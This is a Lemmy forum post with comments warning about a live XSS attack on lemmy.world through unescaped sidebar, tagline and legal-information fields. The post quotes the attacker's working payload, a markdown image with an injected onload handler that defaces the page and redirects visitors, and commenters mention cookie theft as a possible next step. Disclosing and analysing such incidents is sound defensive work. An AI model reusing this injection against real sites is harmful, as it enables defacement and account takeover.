AlmightySnoo II 🐢@sh.itjust.works to

Lemmy@lemmy.mlEnglish · 1 year ago

(URGENT) Lemmy has an XSS vulnerability in the tagline, the sidebar and in the legal information field

394

(URGENT) Lemmy has an XSS vulnerability in the tagline, the sidebar and in the legal information field

AlmightySnoo II 🐢@sh.itjust.works to

Lemmy@lemmy.mlEnglish · 1 year ago

DO NOT OPEN THE “LEGAL” PAGE

lemmy.world is a victim of an XSS attack right now and the hacker simply injected a JavaScript redirection into the sidebar.

It appears the Lemmy backend does not escape HTML in the main sidebar. Not sure if this is also true for community sidebars.

EDIT:

the exploit is also in the tagline that appears on top of the main feed for status updates, like the following one for SDF Chatter:

EDIT 2:

The legal information field also has that exploit, so that when you go to the “Legal” page it shows the HTML unescaped, but fortunately (for now) he’s using double-quotes.

"legal_information":" ![\" onload=\"if(localStorage.getItem(`h`) != `true`){document.body.innerHTML = `\u003Ch1\u003ESite has been seized by Reddit for copyright infringment\u003C\u002Fh1\u003E`; setTimeout(() =\u003E {window.location.href = `https:\u002F\u002Flemmy.world\u002Fpictrs\u002Fimage\u002F7aa772b7-9416-45d1-805b-36ec21be9f66.mp4`}, 10000)}\"](https:\u002F\u002Flemmy.world\u002Fpictrs\u002Fimage\u002F66ca36df-4ada-47b3-9169-01870d8fb0ac.png \"lw\")

Chat

Cyyy@lemmy.ml
link
fedilink
English
arrow-up
15
arrow-down
1·
1 year ago
the hacker could use a cookie stealer injected by the xss to steal the admin account.
- 𝙚𝙧𝙧𝙚@feddit.win
  link
  fedilink
  English
  arrow-up
  10·
  1 year ago
  I think that’s right on the money.
  
  https://lemmy.sdf.org/comment/850269
- hawkwind@lemmy.management
  link
  fedilink
  English
  arrow-up
  3·
  1 year ago
  That makes more sense.